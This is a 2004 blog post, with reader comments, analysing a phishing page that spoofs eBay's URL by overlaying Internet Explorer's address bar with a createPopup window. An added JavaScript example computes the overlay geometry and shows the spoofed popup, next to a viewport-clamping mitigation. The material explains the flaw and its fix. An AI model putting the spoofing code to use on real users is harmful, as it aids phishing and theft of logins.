R.I.P. IE 1995-2004

June 9, 2004

This may very well be the last nail in Internet Explorer's coffin. While reviewing my junk mail this morning I came across the latest in a series of IE exploits used in credit card and identity theft.

The email was a run-of-the-mill forgery purporting to be from eBay. The message contained a link to a replica of the eBay login page, whose sole purpose was to harvest logins and personal information. Call me Captain Obvious, but the bare IP address in the address bar was a dead giveaway. I was about to move on when my curiosity got the better of me and I decided to see what the page looked like in IE (Firefox being my default).

When viewed in Internet Explorer 5.5-6.0, I was surprised to see an eBay URL in the address bar instead of the actual one. Since I had already installed the patch for a similar vulnerability several months prior, I knew something new was afoot.

The source quickly revealed what was happening. IE has a proprietary method, window.createPopup, that creates a chromeless popup window from a web page. A popup is displayed with show(x, y, width, height), and when no parent element is supplied those coordinates are desktop coordinates, so the popup may be drawn anywhere on screen, including over the browser's own toolbars rather than only inside the page's viewport. Popups always close as soon as the user clicks away from them. In this case, a popup is used to overlay the real address in the address bar with a false one.

The exploit is extremely simple:

  1. A popup window is created containing the URL being spoofed (eBay in this case), formatted to look like the text in the address bar.
  2. A listener is added so that when the popup is about to close (that is, the user clicks away and its unload event fires), show is called again so that the overlay never disappears.
  3. Whenever show is called, the dimensions and position of the popup are recalculated from the browser window's current screen position so that it fits within the bounds of the address bar and overlays the real address. That way, if the browser window is moved or resized, the popup follows it accordingly.

See it in action.
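The geometry behind steps 1 and 3, together with the viewport clamp that the comments below report XP SP2 adopted, as an added example in JavaScript. This is not code from the original post or from the phishing page. The toolbar offsets in ASSUMED_CHROME are assumptions standing in for a default IE 6 layout, the window fields mirror what IE exposed as window.screenLeft, window.screenTop and the client size, and the keep-alive listener of step 2 is deliberately left out. Everything except the final show() call runs outside IE.

```javascript
// Added example: the address-bar overlay geometry of the createPopup spoof and
// the viewport clamp that defeats it. Not the phishing page's code; the chrome
// offsets below are assumptions, not measurements.

// Assumed default IE 6 toolbar layout, in pixels. IE's window.screenTop is the
// desktop y of the *content area*, so the address bar lies above it.
const ASSUMED_CHROME = {
  addressBarHeight: 22,    // assumption: height of the URL text box
  addressBarBottomGap: 4,  // assumption: gap between URL box and content area
  addressTextLeft: 60,     // assumption: "Address" label width from the window's left edge
  addressTextRightGap: 80, // assumption: room left for the "Go" button
};

// Exploit step 3: a desktop-coordinate rectangle covering the real URL text.
// win mirrors the IE properties the spoof reads (screenLeft, screenTop, client size).
// Recomputed on every show(), so the overlay follows a moved or resized window.
function overlayRect(win, chrome = ASSUMED_CHROME) {
  return {
    left: win.screenLeft + chrome.addressTextLeft,
    top: win.screenTop - chrome.addressBarBottomGap - chrome.addressBarHeight,
    width: win.clientWidth - chrome.addressTextLeft - chrome.addressTextRightGap,
    height: chrome.addressBarHeight,
  };
}

// The calling page's own viewport in the same desktop coordinates.
function viewportRect(win) {
  return { left: win.screenLeft, top: win.screenTop, width: win.clientWidth, height: win.clientHeight };
}

// Pre-SP2 behaviour: popup.show(x, y, w, h) with no parent element takes desktop
// coordinates and draws anywhere, including over the browser's own chrome.
// Also fills the popup body (step 1). IE-only objects are guarded so the
// function merely returns the geometry where createPopup does not exist.
function showSpoofPopup(popup, win, spoofedUrl) {
  const r = overlayRect(win);
  if (popup && popup.document && typeof popup.show === "function") {
    popup.document.body.innerHTML =
      '<div style="font:8pt Tahoma;background:#fff;white-space:nowrap">' + spoofedUrl + "</div>";
    popup.show(r.left, r.top, r.width, r.height);
  }
  return r;
}

// Mitigation in the style of the SP2 fix: clip the requested rectangle to the
// calling page's viewport. Returns null when nothing would remain visible,
// which is exactly what happens to an address-bar overlay, while an in-page
// menu or dialog keeps its full rectangle.
function clampToViewport(rect, viewport) {
  const left = Math.max(rect.left, viewport.left);
  const top = Math.max(rect.top, viewport.top);
  const right = Math.min(rect.left + rect.width, viewport.left + viewport.width);
  const bottom = Math.min(rect.top + rect.height, viewport.top + viewport.height);
  if (right <= left || bottom <= top) return null;
  return { left, top, width: right - left, height: bottom - top };
}

// Constructed window state (not from the page): viewport at desktop (100,200),
// 800x600 content area.
const SAMPLE_WINDOW = { screenLeft: 100, screenTop: 200, clientWidth: 800, clientHeight: 600 };
```

On a pre-SP2 IE the phishing page would call showSpoofPopup(window.createPopup(), window, spoofedUrl) from its keep-alive handler. With the clamp in place, clampToViewport(overlayRect(SAMPLE_WINDOW), viewportRect(SAMPLE_WINDOW)) is null because the whole overlay lies above the content area, whereas a 200x150 menu at (300, 400) inside the page comes back unchanged, which is why the restriction preserves the legitimate uses while killing the spoof.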

While there were some reports of this exploit in May, it has received no media attention since then and remains relatively unknown despite its severity. Odds are its use will continue to spread until action is taken, but by then it may be too late for Internet Explorer.

I say this is the end of IE not because this exploit is being used in new and unanticipated ways. Rather, this is the end because Microsoft is in a lose-lose situation and for many users this will be the last straw. This exploit is unique in that it is based on a feature that is intrinsic to IE. For better or worse, many web sites and intranet applications depend on the createPopup function for things such as custom menus, dialogs and other legitimate uses. It is virtually impossible for Microsoft to patch this vulnerability without crippling these users. But to leave it as-is would be an even bigger disaster.

If you or your parents/friends/employees/pets are still using Internet Explorer, now is as good a time as any to try something new.

Posted by jon at June 9, 2004 2:41 AM

Comments

What a great story. I have been working on my site and my default browser is Firefox, and I went to my site in IE 5.5 and it looked bad. Looks great in my FF, but I then checked out some of the CSS leader's sites and their sites were blown out in IE too. I'm bailing IE - Later IE nice to meetcha...

Posted by: Matt W. at June 26, 2004 4:59 PM

Come on, if you're stupid enough to not notice a pop-up, you deserve to be exploited.
This is dumb, and they're calling this a "critical" problem now. Why don't people understand that the Internet is a web application platform -- it's not just made for old ladies selling quilts on eBay. It's a powerful development environment and calling its capabilities "flaws" is just stupid. Educate people -- don't cripple development tools!!
I for one hope they leave createPopup() alone. It makes for some very sexy menus...

Posted by: Jonathan Wise at July 13, 2004 11:40 AM

>if you're stupid enough to not notice a pop-up, you deserve to be exploited.

Perhaps, but this vulnerability goes beyond that. It can be used to totally mask an ActiveX installation prompt so that it appears entirely legitimate:

http://www.securiteam.com/windowsntfocus/5RP0G1FAKC.html

There's a link to an example of the exploit towards the bottom of the page. You and I would think twice before clicking, but your average user over the age of 30 would probably just click yes since it's a "legitimate" warning.

Don't know how feasible it would be, but IMHO the ideal solution would be for Microsoft to partially cripple createPopup -- only allow it to be over the viewport of the window calling it and nowhere else (other windows or areas of the screen). That way it retains its basic functionality but can't be exploited in the same way.

Posted by: jon at July 13, 2004 11:59 AM

> Come on, if you're stupid enough to not notice a pop-up, you deserve to be exploited.

In the case with this phishing scam, there is no "popup" to speak of, so anybody using IE could be suckered into thinking the page was legit.

Technically there *is* a popup, but not in the traditional sense. A fake address covers up the real address bar, remains over it if the window is moved, and cannot be detected visually unless you move the window very quickly. Because people generally trust the address bar, this is a very serious security hole.

Posted by: jon at July 13, 2004 12:34 PM

I just came across this article while trying out whether the new IE in XP SP2 is still vulnerable to various exploits and I'm happy to report that it seems that IE does now limit the createPopup functionality to the viewport of the current page as jon suggested in the previous comment.

Let's just hope that the fix is a solid one that's not worked around in a few days...

Posted by: nerve at July 13, 2004 12:39 PM